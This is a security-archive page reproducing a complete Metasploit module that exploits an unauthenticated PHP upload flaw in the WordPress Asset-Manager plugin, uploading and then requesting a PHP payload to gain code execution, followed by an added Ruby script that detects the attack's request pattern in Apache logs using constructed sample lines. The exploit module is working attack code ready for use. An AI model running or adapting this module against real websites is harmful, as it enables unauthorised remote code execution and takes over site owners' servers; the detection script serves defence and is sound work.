WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin allows PHP files to be uploaded: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin reads the upload from the "Filedata" field.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data,
    })

    # A successful upload echoes the stored file name back in the response body.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
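The module above leaves a distinctive two-request trace in the web server log: an unauthenticated POST to wp-content/plugins/asset-manager/upload.php, then a GET of a freshly named .php file under wp-content/uploads/assets/temp/. The following detection script is an added example written for this page; it is not part of the original post or of the Metasploit module. It parses Apache "combined" access log lines (the sample lines are constructed), flags either request on its own, and raises the severity when the same client performs both within a short window. The log lines, IP addresses and file name are constructed; the two URL paths are the ones the module uses.

```ruby
require 'time'

# Constructed sample of Apache "combined" access log lines (not real traffic).
# Lines 2 and 3 together match the exploit's request sequence: a POST to the
# plugin's upload.php followed by a GET of a .php file from the temp directory.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:20:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:05 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:06 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzrm.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:21:10 +0000] "GET /wordpress/wp-content/uploads/assets/temp/brochure.pdf HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:21:12 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
LOG

# Fields we need from the combined log format: client IP, timestamp, method, path, status.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

# Paths used by the module: the unauthenticated upload handler and the temp dir it writes to.
UPLOAD_RE   = %r{/wp-content/plugins/asset-manager/upload\.php\z}i
TEMP_PHP_RE = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}i

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[:ip],
    time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method],
    path: m[:path].split('?').first,   # drop any query string before matching
    status: m[:status].to_i }
end

def classify(entry)
  return :upload   if entry[:method] == 'POST' && entry[:path] =~ UPLOAD_RE
  return :temp_php if entry[:method] == 'GET'  && entry[:path] =~ TEMP_PHP_RE
  nil
end

# Returns a list of alert hashes. A GET of a .php file under the uploads temp
# dir is suspicious by itself (an uploads directory should never serve
# executable files); an upload.php POST followed within `window` seconds by
# such a GET from the same client is flagged as a probable exploitation chain.
def detect(log_text, window: 60)
  entries = log_text.each_line.filter_map { |l| parse_line(l.strip) }
  alerts = []
  last_upload = {}  # client ip => time of its most recent upload.php POST
  entries.each do |e|
    case classify(e)
    when :upload
      last_upload[e[:ip]] = e[:time]
      alerts << { ip: e[:ip], severity: :medium, path: e[:path],
                  reason: 'POST to asset-manager upload.php (unauthenticated upload endpoint)' }
    when :temp_php
      chained = last_upload[e[:ip]] && (e[:time] - last_upload[e[:ip]]) <= window
      alerts << { ip: e[:ip], severity: chained ? :high : :medium, path: e[:path],
                  reason: chained ? 'upload followed by request for .php in uploads temp dir' :
                                    '.php file served from uploads temp dir' }
    end
  end
  alerts
end

if __FILE__ == $0
  detect(SAMPLE_LOG).each do |a|
    puts "#{a[:severity].to_s.upcase}: #{a[:ip]} #{a[:reason]} (#{a[:path]})"
  end
end
```

The second rule is the more durable one: whatever the plugin version, a web server that executes .php files out of wp-content/uploads is misconfigured, so the GET to the temp directory is worth alerting on even when no matching POST is seen (for example when the two requests land on different log files). Tightening the window to zero shows the chain logic degrading gracefully to the single-request rule.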